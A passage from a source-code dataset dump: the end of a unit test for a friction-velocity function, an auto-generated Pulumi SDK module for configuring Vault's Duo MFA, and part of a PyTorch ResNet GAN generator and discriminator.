        u, v, w, u_star_true = self.get_uvw_and_known_u_star_non_zero_mean()
        assert_almost_equal(friction_velocity(u, w, perturbation=False),
                            u_star_true['uw'])
        assert_almost_equal(friction_velocity(u, w, v=v, perturbation=False),
                            u_star_true['uwvw'])

    def test_u_star_2d_axis_last(self):
        """2-D input shaped (3, 5): the time axis is the last one."""
        u, v, w, u_star_true = self.get_uvw_and_known_u_star_zero_mean()
        u = np.array([u, u, u])
        v = np.array([v, v, v])
        w = np.array([w, w, w])
        # replicate the expected scalars across the three rows in place
        for key in u_star_true.keys():
            tmp = u_star_true[key]
            u_star_true[key] = np.array([tmp, tmp, tmp])
        assert_almost_equal(friction_velocity(u, w, perturbation=False,
                                              axis=-1), u_star_true['uw'])
        assert_almost_equal(friction_velocity(u, w, v=v, perturbation=False,
                                              axis=-1), u_star_true['uwvw'])
        # now use a non-zero mean
        u, v, w, u_star_true = self.get_uvw_and_known_u_star_non_zero_mean()
        u = np.array([u, u, u])
        v = np.array([v, v, v])
        w = np.array([w, w, w])
        for key in u_star_true.keys():
            tmp = u_star_true[key]
            u_star_true[key] = np.array([tmp, tmp, tmp])
        assert_almost_equal(friction_velocity(u, w, perturbation=False,
                                              axis=-1), u_star_true['uw'])
        assert_almost_equal(friction_velocity(u, w, v=v, perturbation=False,
                                              axis=-1), u_star_true['uwvw'])

    def test_u_star_2d_axis_first(self):
        """2-D input shaped (5, 3): the time axis is the first one."""
        u, v, w, u_star_true = self.get_uvw_and_known_u_star_zero_mean()
        u = np.array([u, u, u]).transpose()
        v = np.array([v, v, v]).transpose()
        w = np.array([w, w, w]).transpose()
        # replicate the expected scalars across the three columns in place
        for key in u_star_true.keys():
            tmp = u_star_true[key]
            u_star_true[key] = np.array([tmp, tmp, tmp]).transpose()
        assert_almost_equal(friction_velocity(u, w, perturbation=False,
                                              axis=0), u_star_true['uw'])
        assert_almost_equal(friction_velocity(u, w, v=v, perturbation=False,
                                              axis=0), u_star_true['uwvw'])
        # now use a non-zero mean
        u, v, w, u_star_true = self.get_uvw_and_known_u_star_non_zero_mean()
        u = np.array([u, u, u]).transpose()
        v = np.array([v, v, v]).transpose()
        w = np.array([w, w, w]).transpose()
        for key in u_star_true.keys():
            tmp = u_star_true[key]
            u_star_true[key] = np.array([tmp, tmp, tmp]).transpose()
        assert_almost_equal(friction_velocity(u, w, perturbation=False,
                                              axis=0), u_star_true['uw'])
        assert_almost_equal(friction_velocity(u, w, v=v, perturbation=False,
                                              axis=0), u_star_true['uwvw'])
| 45.478916 | 79 | 0.592821 | 2,214 | 15,099 | 3.771003 | 0.054201 | 0.045275 | 0.084321 | 0.080848 | 0.889448 | 0.871721 | 0.852437 | 0.814109 | 0.793508 | 0.743682 | 0 | 0.019809 | 0.284522 | 15,099 | 331 | 80 | 45.616314 | 0.753032 | 0.078085 | 0 | 0.70696 | 0 | 0 | 0.006913 | 0 | 0 | 0 | 0 | 0 | 0.205128 | 1 | 0.102564 | false | 0 | 0.010989 | 0 | 0.153846 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5f83a4bf858120d863a9c01a16d800340842b8bb | 24,089 | py | Python | sdk/python/pulumi_vault/mfa_duo.py | pulumi/pulumi-vault | 1682875f4a5d7d508f36e166529ad2b8aec34090 | [
"ECL-2.0",
"Apache-2.0"
] | 10 | 2019-10-07T17:44:18.000Z | 2022-03-30T20:46:33.000Z | sdk/python/pulumi_vault/mfa_duo.py | pulumi/pulumi-vault | 1682875f4a5d7d508f36e166529ad2b8aec34090 | [
"ECL-2.0",
"Apache-2.0"
] | 79 | 2019-10-11T18:13:07.000Z | 2022-03-31T21:09:41.000Z | sdk/python/pulumi_vault/mfa_duo.py | pulumi/pulumi-vault | 1682875f4a5d7d508f36e166529ad2b8aec34090 | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2019-10-28T10:08:40.000Z | 2020-03-17T14:20:55.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['MfaDuoArgs', 'MfaDuo']
@pulumi.input_type
class MfaDuoArgs:
    # Auto-generated by the Pulumi Terraform bridge (see tfgen warning at the
    # top of this file): the argument bag accepted by the MfaDuo resource
    # constructor.  The @pulumi.input_type decorator introspects the
    # @pulumi.getter-decorated properties below, so the property names and
    # their camelCase "name=..." mappings should not be changed by hand.
    def __init__(__self__, *,
                 api_hostname: pulumi.Input[str],
                 integration_key: pulumi.Input[str],
                 mount_accessor: pulumi.Input[str],
                 secret_key: pulumi.Input[str],
                 name: Optional[pulumi.Input[str]] = None,
                 push_info: Optional[pulumi.Input[str]] = None,
                 username_format: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a MfaDuo resource.
        :param pulumi.Input[str] api_hostname: `(string: <required>)` - API hostname for Duo.
        :param pulumi.Input[str] integration_key: `(string: <required>)` - Integration key for Duo.
        :param pulumi.Input[str] mount_accessor: `(string: <required>)` - The mount to tie this method to for use in automatic mappings. The mapping will use the Name field of Aliases associated with this mount as the username in the mapping.
        :param pulumi.Input[str] secret_key: `(string: <required>)` - Secret key for Duo.
        :param pulumi.Input[str] name: `(string: <required>)` – Name of the MFA method.
        :param pulumi.Input[str] push_info: `(string)` - Push information for Duo.
        :param pulumi.Input[str] username_format: `(string)` - A format string for mapping Identity names to MFA method names. Values to substitute should be placed in `{{}}`. For example, `"{{alias.name}}@example.com"`. If blank, the Alias's Name field will be used as-is. Currently-supported mappings:
               - alias.name: The name returned by the mount configured via the `mount_accessor` parameter
               - entity.name: The name configured for the Entity
               - alias.metadata.`<key>`: The value of the Alias's metadata parameter
               - entity.metadata.`<key>`: The value of the Entity's metadata parameter
        """
        # Required properties are always recorded; optional ones only when
        # supplied, so unset values are omitted entirely.
        pulumi.set(__self__, "api_hostname", api_hostname)
        pulumi.set(__self__, "integration_key", integration_key)
        pulumi.set(__self__, "mount_accessor", mount_accessor)
        pulumi.set(__self__, "secret_key", secret_key)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if push_info is not None:
            pulumi.set(__self__, "push_info", push_info)
        if username_format is not None:
            pulumi.set(__self__, "username_format", username_format)

    @property
    @pulumi.getter(name="apiHostname")
    def api_hostname(self) -> pulumi.Input[str]:
        """
        `(string: <required>)` - API hostname for Duo.
        """
        return pulumi.get(self, "api_hostname")

    @api_hostname.setter
    def api_hostname(self, value: pulumi.Input[str]):
        pulumi.set(self, "api_hostname", value)

    @property
    @pulumi.getter(name="integrationKey")
    def integration_key(self) -> pulumi.Input[str]:
        """
        `(string: <required>)` - Integration key for Duo.
        """
        return pulumi.get(self, "integration_key")

    @integration_key.setter
    def integration_key(self, value: pulumi.Input[str]):
        pulumi.set(self, "integration_key", value)

    @property
    @pulumi.getter(name="mountAccessor")
    def mount_accessor(self) -> pulumi.Input[str]:
        """
        `(string: <required>)` - The mount to tie this method to for use in automatic mappings. The mapping will use the Name field of Aliases associated with this mount as the username in the mapping.
        """
        return pulumi.get(self, "mount_accessor")

    @mount_accessor.setter
    def mount_accessor(self, value: pulumi.Input[str]):
        pulumi.set(self, "mount_accessor", value)

    @property
    @pulumi.getter(name="secretKey")
    def secret_key(self) -> pulumi.Input[str]:
        """
        `(string: <required>)` - Secret key for Duo.
        """
        return pulumi.get(self, "secret_key")

    @secret_key.setter
    def secret_key(self, value: pulumi.Input[str]):
        pulumi.set(self, "secret_key", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        `(string: <required>)` – Name of the MFA method.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="pushInfo")
    def push_info(self) -> Optional[pulumi.Input[str]]:
        """
        `(string)` - Push information for Duo.
        """
        return pulumi.get(self, "push_info")

    @push_info.setter
    def push_info(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "push_info", value)

    @property
    @pulumi.getter(name="usernameFormat")
    def username_format(self) -> Optional[pulumi.Input[str]]:
        """
        `(string)` - A format string for mapping Identity names to MFA method names. Values to substitute should be placed in `{{}}`. For example, `"{{alias.name}}@example.com"`. If blank, the Alias's Name field will be used as-is. Currently-supported mappings:
        - alias.name: The name returned by the mount configured via the `mount_accessor` parameter
        - entity.name: The name configured for the Entity
        - alias.metadata.`<key>`: The value of the Alias's metadata parameter
        - entity.metadata.`<key>`: The value of the Entity's metadata parameter
        """
        return pulumi.get(self, "username_format")

    @username_format.setter
    def username_format(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "username_format", value)
@pulumi.input_type
class _MfaDuoState:
    # Auto-generated state bag for MfaDuo: unlike MfaDuoArgs, every property
    # here is Optional because this type is used to look up / filter existing
    # resources, where any subset of fields may be known.
    def __init__(__self__, *,
                 api_hostname: Optional[pulumi.Input[str]] = None,
                 integration_key: Optional[pulumi.Input[str]] = None,
                 mount_accessor: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 push_info: Optional[pulumi.Input[str]] = None,
                 secret_key: Optional[pulumi.Input[str]] = None,
                 username_format: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering MfaDuo resources.
        :param pulumi.Input[str] api_hostname: `(string: <required>)` - API hostname for Duo.
        :param pulumi.Input[str] integration_key: `(string: <required>)` - Integration key for Duo.
        :param pulumi.Input[str] mount_accessor: `(string: <required>)` - The mount to tie this method to for use in automatic mappings. The mapping will use the Name field of Aliases associated with this mount as the username in the mapping.
        :param pulumi.Input[str] name: `(string: <required>)` – Name of the MFA method.
        :param pulumi.Input[str] push_info: `(string)` - Push information for Duo.
        :param pulumi.Input[str] secret_key: `(string: <required>)` - Secret key for Duo.
        :param pulumi.Input[str] username_format: `(string)` - A format string for mapping Identity names to MFA method names. Values to substitute should be placed in `{{}}`. For example, `"{{alias.name}}@example.com"`. If blank, the Alias's Name field will be used as-is. Currently-supported mappings:
               - alias.name: The name returned by the mount configured via the `mount_accessor` parameter
               - entity.name: The name configured for the Entity
               - alias.metadata.`<key>`: The value of the Alias's metadata parameter
               - entity.metadata.`<key>`: The value of the Entity's metadata parameter
        """
        # Only record the properties that were actually supplied.
        if api_hostname is not None:
            pulumi.set(__self__, "api_hostname", api_hostname)
        if integration_key is not None:
            pulumi.set(__self__, "integration_key", integration_key)
        if mount_accessor is not None:
            pulumi.set(__self__, "mount_accessor", mount_accessor)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if push_info is not None:
            pulumi.set(__self__, "push_info", push_info)
        if secret_key is not None:
            pulumi.set(__self__, "secret_key", secret_key)
        if username_format is not None:
            pulumi.set(__self__, "username_format", username_format)

    @property
    @pulumi.getter(name="apiHostname")
    def api_hostname(self) -> Optional[pulumi.Input[str]]:
        """
        `(string: <required>)` - API hostname for Duo.
        """
        return pulumi.get(self, "api_hostname")

    @api_hostname.setter
    def api_hostname(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "api_hostname", value)

    @property
    @pulumi.getter(name="integrationKey")
    def integration_key(self) -> Optional[pulumi.Input[str]]:
        """
        `(string: <required>)` - Integration key for Duo.
        """
        return pulumi.get(self, "integration_key")

    @integration_key.setter
    def integration_key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "integration_key", value)

    @property
    @pulumi.getter(name="mountAccessor")
    def mount_accessor(self) -> Optional[pulumi.Input[str]]:
        """
        `(string: <required>)` - The mount to tie this method to for use in automatic mappings. The mapping will use the Name field of Aliases associated with this mount as the username in the mapping.
        """
        return pulumi.get(self, "mount_accessor")

    @mount_accessor.setter
    def mount_accessor(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "mount_accessor", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        `(string: <required>)` – Name of the MFA method.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="pushInfo")
    def push_info(self) -> Optional[pulumi.Input[str]]:
        """
        `(string)` - Push information for Duo.
        """
        return pulumi.get(self, "push_info")

    @push_info.setter
    def push_info(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "push_info", value)

    @property
    @pulumi.getter(name="secretKey")
    def secret_key(self) -> Optional[pulumi.Input[str]]:
        """
        `(string: <required>)` - Secret key for Duo.
        """
        return pulumi.get(self, "secret_key")

    @secret_key.setter
    def secret_key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "secret_key", value)

    @property
    @pulumi.getter(name="usernameFormat")
    def username_format(self) -> Optional[pulumi.Input[str]]:
        """
        `(string)` - A format string for mapping Identity names to MFA method names. Values to substitute should be placed in `{{}}`. For example, `"{{alias.name}}@example.com"`. If blank, the Alias's Name field will be used as-is. Currently-supported mappings:
        - alias.name: The name returned by the mount configured via the `mount_accessor` parameter
        - entity.name: The name configured for the Entity
        - alias.metadata.`<key>`: The value of the Alias's metadata parameter
        - entity.metadata.`<key>`: The value of the Entity's metadata parameter
        """
        return pulumi.get(self, "username_format")

    @username_format.setter
    def username_format(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "username_format", value)
class MfaDuo(pulumi.CustomResource):
    # Auto-generated resource wrapper for Vault's Duo MFA method
    # (Pulumi type token 'vault:index/mfaDuo:MfaDuo').  See the tfgen warning
    # at the top of this file: do not edit by hand.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 api_hostname: Optional[pulumi.Input[str]] = None,
                 integration_key: Optional[pulumi.Input[str]] = None,
                 mount_accessor: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 push_info: Optional[pulumi.Input[str]] = None,
                 secret_key: Optional[pulumi.Input[str]] = None,
                 username_format: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Provides a resource to manage [Duo MFA](https://www.vaultproject.io/docs/enterprise/mfa/mfa-duo.html).

        **Note** this feature is available only with Vault Enterprise.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_vault as vault

        userpass = vault.AuthBackend("userpass",
            type="userpass",
            path="userpass")
        my_duo = vault.MfaDuo("myDuo",
            mount_accessor=userpass.accessor,
            secret_key="8C7THtrIigh2rPZQMbguugt8IUftWhMRCOBzbuyz",
            integration_key="BIACEUEAXI20BNWTEYXT",
            api_hostname="api-2b5c39f5.duosecurity.com")
        ```

        ## Import

        Mounts can be imported using the `path`, e.g.

        ```sh
         $ pulumi import vault:index/mfaDuo:MfaDuo my_duo my_duo
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] api_hostname: `(string: <required>)` - API hostname for Duo.
        :param pulumi.Input[str] integration_key: `(string: <required>)` - Integration key for Duo.
        :param pulumi.Input[str] mount_accessor: `(string: <required>)` - The mount to tie this method to for use in automatic mappings. The mapping will use the Name field of Aliases associated with this mount as the username in the mapping.
        :param pulumi.Input[str] name: `(string: <required>)` – Name of the MFA method.
        :param pulumi.Input[str] push_info: `(string)` - Push information for Duo.
        :param pulumi.Input[str] secret_key: `(string: <required>)` - Secret key for Duo.
        :param pulumi.Input[str] username_format: `(string)` - A format string for mapping Identity names to MFA method names. Values to substitute should be placed in `{{}}`. For example, `"{{alias.name}}@example.com"`. If blank, the Alias's Name field will be used as-is. Currently-supported mappings:
               - alias.name: The name returned by the mount configured via the `mount_accessor` parameter
               - entity.name: The name configured for the Entity
               - alias.metadata.`<key>`: The value of the Alias's metadata parameter
               - entity.metadata.`<key>`: The value of the Entity's metadata parameter
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: MfaDuoArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Provides a resource to manage [Duo MFA](https://www.vaultproject.io/docs/enterprise/mfa/mfa-duo.html).

        **Note** this feature is available only with Vault Enterprise.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_vault as vault

        userpass = vault.AuthBackend("userpass",
            type="userpass",
            path="userpass")
        my_duo = vault.MfaDuo("myDuo",
            mount_accessor=userpass.accessor,
            secret_key="8C7THtrIigh2rPZQMbguugt8IUftWhMRCOBzbuyz",
            integration_key="BIACEUEAXI20BNWTEYXT",
            api_hostname="api-2b5c39f5.duosecurity.com")
        ```

        ## Import

        Mounts can be imported using the `path`, e.g.

        ```sh
         $ pulumi import vault:index/mfaDuo:MfaDuo my_duo my_duo
        ```

        :param str resource_name: The name of the resource.
        :param MfaDuoArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the two overloads above: callers pass either an
        # MfaDuoArgs bag or individual keyword arguments.
        resource_args, opts = _utilities.get_resource_args_opts(MfaDuoArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 api_hostname: Optional[pulumi.Input[str]] = None,
                 integration_key: Optional[pulumi.Input[str]] = None,
                 mount_accessor: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 push_info: Optional[pulumi.Input[str]] = None,
                 secret_key: Optional[pulumi.Input[str]] = None,
                 username_format: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource: validate required inputs (unless we are
            # reconstructing from a URN) and build the property bag.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = MfaDuoArgs.__new__(MfaDuoArgs)

            if api_hostname is None and not opts.urn:
                raise TypeError("Missing required property 'api_hostname'")
            __props__.__dict__["api_hostname"] = api_hostname
            if integration_key is None and not opts.urn:
                raise TypeError("Missing required property 'integration_key'")
            __props__.__dict__["integration_key"] = integration_key
            if mount_accessor is None and not opts.urn:
                raise TypeError("Missing required property 'mount_accessor'")
            __props__.__dict__["mount_accessor"] = mount_accessor
            __props__.__dict__["name"] = name
            __props__.__dict__["push_info"] = push_info
            if secret_key is None and not opts.urn:
                raise TypeError("Missing required property 'secret_key'")
            __props__.__dict__["secret_key"] = secret_key
            __props__.__dict__["username_format"] = username_format
        super(MfaDuo, __self__).__init__(
            'vault:index/mfaDuo:MfaDuo',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            api_hostname: Optional[pulumi.Input[str]] = None,
            integration_key: Optional[pulumi.Input[str]] = None,
            mount_accessor: Optional[pulumi.Input[str]] = None,
            name: Optional[pulumi.Input[str]] = None,
            push_info: Optional[pulumi.Input[str]] = None,
            secret_key: Optional[pulumi.Input[str]] = None,
            username_format: Optional[pulumi.Input[str]] = None) -> 'MfaDuo':
        """
        Get an existing MfaDuo resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] api_hostname: `(string: <required>)` - API hostname for Duo.
        :param pulumi.Input[str] integration_key: `(string: <required>)` - Integration key for Duo.
        :param pulumi.Input[str] mount_accessor: `(string: <required>)` - The mount to tie this method to for use in automatic mappings. The mapping will use the Name field of Aliases associated with this mount as the username in the mapping.
        :param pulumi.Input[str] name: `(string: <required>)` – Name of the MFA method.
        :param pulumi.Input[str] push_info: `(string)` - Push information for Duo.
        :param pulumi.Input[str] secret_key: `(string: <required>)` - Secret key for Duo.
        :param pulumi.Input[str] username_format: `(string)` - A format string for mapping Identity names to MFA method names. Values to substitute should be placed in `{{}}`. For example, `"{{alias.name}}@example.com"`. If blank, the Alias's Name field will be used as-is. Currently-supported mappings:
               - alias.name: The name returned by the mount configured via the `mount_accessor` parameter
               - entity.name: The name configured for the Entity
               - alias.metadata.`<key>`: The value of the Alias's metadata parameter
               - entity.metadata.`<key>`: The value of the Entity's metadata parameter
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _MfaDuoState.__new__(_MfaDuoState)

        __props__.__dict__["api_hostname"] = api_hostname
        __props__.__dict__["integration_key"] = integration_key
        __props__.__dict__["mount_accessor"] = mount_accessor
        __props__.__dict__["name"] = name
        __props__.__dict__["push_info"] = push_info
        __props__.__dict__["secret_key"] = secret_key
        __props__.__dict__["username_format"] = username_format
        return MfaDuo(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter(name="apiHostname")
    def api_hostname(self) -> pulumi.Output[str]:
        """
        `(string: <required>)` - API hostname for Duo.
        """
        return pulumi.get(self, "api_hostname")

    @property
    @pulumi.getter(name="integrationKey")
    def integration_key(self) -> pulumi.Output[str]:
        """
        `(string: <required>)` - Integration key for Duo.
        """
        return pulumi.get(self, "integration_key")

    @property
    @pulumi.getter(name="mountAccessor")
    def mount_accessor(self) -> pulumi.Output[str]:
        """
        `(string: <required>)` - The mount to tie this method to for use in automatic mappings. The mapping will use the Name field of Aliases associated with this mount as the username in the mapping.
        """
        return pulumi.get(self, "mount_accessor")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        `(string: <required>)` – Name of the MFA method.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter(name="pushInfo")
    def push_info(self) -> pulumi.Output[Optional[str]]:
        """
        `(string)` - Push information for Duo.
        """
        return pulumi.get(self, "push_info")

    @property
    @pulumi.getter(name="secretKey")
    def secret_key(self) -> pulumi.Output[str]:
        """
        `(string: <required>)` - Secret key for Duo.
        """
        return pulumi.get(self, "secret_key")

    @property
    @pulumi.getter(name="usernameFormat")
    def username_format(self) -> pulumi.Output[Optional[str]]:
        """
        `(string)` - A format string for mapping Identity names to MFA method names. Values to substitute should be placed in `{{}}`. For example, `"{{alias.name}}@example.com"`. If blank, the Alias's Name field will be used as-is. Currently-supported mappings:
        - alias.name: The name returned by the mount configured via the `mount_accessor` parameter
        - entity.name: The name configured for the Entity
        - alias.metadata.`<key>`: The value of the Alias's metadata parameter
        - entity.metadata.`<key>`: The value of the Entity's metadata parameter
        """
        return pulumi.get(self, "username_format")
| 46.865759 | 303 | 0.636639 | 2,914 | 24,089 | 5.084763 | 0.069664 | 0.070527 | 0.087872 | 0.075724 | 0.897078 | 0.880205 | 0.86691 | 0.846595 | 0.825606 | 0.817372 | 0 | 0.001274 | 0.25028 | 24,089 | 513 | 304 | 46.957115 | 0.818771 | 0.423928 | 0 | 0.700758 | 1 | 0 | 0.103205 | 0.002008 | 0 | 0 | 0 | 0 | 0 | 1 | 0.159091 | false | 0.003788 | 0.018939 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
5fc283a32f973bd2ab111b0fb00976fe97ccb988 | 11,444 | py | Python | model.py | enisimsar/FIGR | 2a279a42e093821c97fc4b4463f924e9968dd9c1 | [
"MIT"
] | 39 | 2019-05-29T12:54:11.000Z | 2022-03-24T15:33:19.000Z | model.py | enisimsar/FIGR | 2a279a42e093821c97fc4b4463f924e9968dd9c1 | [
"MIT"
] | 4 | 2019-06-18T11:08:51.000Z | 2020-04-23T09:45:39.000Z | model.py | enisimsar/FIGR | 2a279a42e093821c97fc4b4463f924e9968dd9c1 | [
"MIT"
] | 13 | 2019-07-06T23:19:15.000Z | 2022-01-20T16:16:49.000Z | import torch.nn as nn
import torch.nn.functional as F
class ResNetGenerator(nn.Module):
    """Upsampling image generator built from residual conv blocks.

    A latent vector of size ``input_size`` is projected to a
    ``hidden_size * 2**blocks``-channel feature map at 1/2**blocks of the
    target resolution.  Each of the ``blocks`` stages applies two residual
    units, then a transition that halves the channel count while the
    spatial size is doubled.  A final 5x5 convolution + tanh produces
    ``image_channels`` output maps with values in [-1, 1].
    """

    def __init__(self, input_size, image_channels=1, height=32, length=32,
                 hidden_size=64, blocks=4):
        super(ResNetGenerator, self).__init__()
        self.hidden_size = hidden_size
        self.blocks = blocks
        self.height = height
        self.length = length
        self.mult = 2 ** blocks

        # Size of the seed feature map produced from the latent vector.
        # Parenthesized so it always matches the .view() in forward().
        flat = hidden_size * self.mult * (height // self.mult) * (length // self.mult)
        self.initial_linear = nn.Linear(input_size, flat)
        self.initial_norm = nn.LayerNorm(flat)
        self.initial_activ = nn.PReLU(flat)

        def channels(i):
            # Channel count entering stage i (halved by each transition).
            return hidden_size * 2 ** (blocks - i)

        def spatial(i):
            # Spatial size of the feature map entering stage i.
            return height // (2 ** (blocks - i)), length // (2 ** (blocks - i))

        # Factories for the per-stage module lists; the four identical
        # copies below were previously written out by hand.
        def conv_stack():
            return nn.ModuleList([nn.Conv2d(channels(i), channels(i), (3, 3),
                                            padding=(1, 1))
                                  for i in range(blocks)])

        def norm_stack():
            return nn.ModuleList([nn.LayerNorm([channels(i), *spatial(i)])
                                  for i in range(blocks)])

        def activ_stack():
            return nn.ModuleList([nn.PReLU(channels(i)) for i in range(blocks)])

        # Two residual units per stage: convs1+convs2 form the first unit,
        # convs3+convs4 the second (see forward()).
        self.convs1, self.norm1, self.activ1 = conv_stack(), norm_stack(), activ_stack()
        self.convs2, self.norm2, self.activ2 = conv_stack(), norm_stack(), activ_stack()
        self.convs3, self.norm3, self.activ3 = conv_stack(), norm_stack(), activ_stack()
        self.convs4, self.norm4, self.activ4 = conv_stack(), norm_stack(), activ_stack()

        # Transition i halves the channel count; forward() then doubles the
        # spatial resolution by interpolation.
        self.transitions_conv = nn.ModuleList(
            [nn.Conv2d(channels(i), channels(i + 1), (3, 3), padding=(1, 1))
             for i in range(blocks)])
        self.transitions_norm = nn.ModuleList(
            [nn.LayerNorm([channels(i + 1), *spatial(i)]) for i in range(blocks)])
        self.transitions_activ = nn.ModuleList(
            [nn.PReLU(channels(i + 1)) for i in range(blocks)])

        self.final_conv = nn.Conv2d(hidden_size, image_channels, (5, 5), padding=(2, 2))
        self.final_activ = nn.Tanh()

    def forward(self, inputs):
        """Map latents of shape (batch, input_size) to images of shape
        (batch, image_channels, height, length) with values in [-1, 1]."""
        x = self.initial_linear(inputs)
        x = self.initial_activ(x)
        x = self.initial_norm(x)
        x = x.view(x.shape[0], self.hidden_size * self.mult,
                   self.height // self.mult, self.length // self.mult)
        for i in range(self.blocks):
            # First residual unit.
            fx = self.norm1[i](self.activ1[i](self.convs1[i](x)))
            fx = self.norm2[i](self.activ2[i](self.convs2[i](fx)))
            x = x + fx
            # Second residual unit.
            fx = self.norm3[i](self.activ3[i](self.convs3[i](x)))
            fx = self.norm4[i](self.activ4[i](self.convs4[i](fx)))
            x = x + fx
            # Transition: halve channels, then double the spatial size.
            x = self.transitions_conv[i](x)
            x = self.transitions_activ[i](x)
            x = self.transitions_norm[i](x)
            # F.upsample is deprecated; F.interpolate is the drop-in
            # replacement (same default 'nearest' mode).
            x = F.interpolate(x, scale_factor=2)
        x = self.final_conv(x)
        x = self.final_activ(x)
        return x
class ResNetDiscriminator(nn.Module):
    """Downsampling discriminator built from residual conv blocks.

    Each of the ``blocks`` stages applies two residual units, then a
    transition that doubles the channel count followed by 2x average
    pooling.  A global average pool and a linear layer map the features
    to a single realness score per image.
    """

    def __init__(self, image_channels=1, height=32, length=32, hidden_size=64,
                 blocks=4):
        super(ResNetDiscriminator, self).__init__()
        self.hidden_size = hidden_size
        self.blocks = blocks

        # Stem: lift the image into hidden_size feature maps at full resolution.
        self.initial_conv = nn.Conv2d(image_channels, hidden_size, (7, 7), padding=(3, 3))
        self.initial_norm = nn.LayerNorm([hidden_size, height, length])
        self.initial_activ = nn.PReLU(hidden_size)

        def channels(i):
            # Channel count entering stage i (doubled by each transition).
            return hidden_size * 2 ** i

        def spatial(i):
            # Spatial size of the feature map entering stage i.
            return height // (2 ** i), length // (2 ** i)

        # Factories for the per-stage module lists; the four identical
        # copies below were previously written out by hand.
        def conv_stack():
            return nn.ModuleList([nn.Conv2d(channels(i), channels(i), (3, 3),
                                            padding=(1, 1))
                                  for i in range(blocks)])

        def norm_stack():
            return nn.ModuleList([nn.LayerNorm([channels(i), *spatial(i)])
                                  for i in range(blocks)])

        def activ_stack():
            return nn.ModuleList([nn.PReLU(channels(i)) for i in range(blocks)])

        # Two residual units per stage: convs1+convs2 form the first unit,
        # convs3+convs4 the second (see forward()).
        self.convs1, self.norm1, self.activ1 = conv_stack(), norm_stack(), activ_stack()
        self.convs2, self.norm2, self.activ2 = conv_stack(), norm_stack(), activ_stack()
        self.convs3, self.norm3, self.activ3 = conv_stack(), norm_stack(), activ_stack()
        self.convs4, self.norm4, self.activ4 = conv_stack(), norm_stack(), activ_stack()

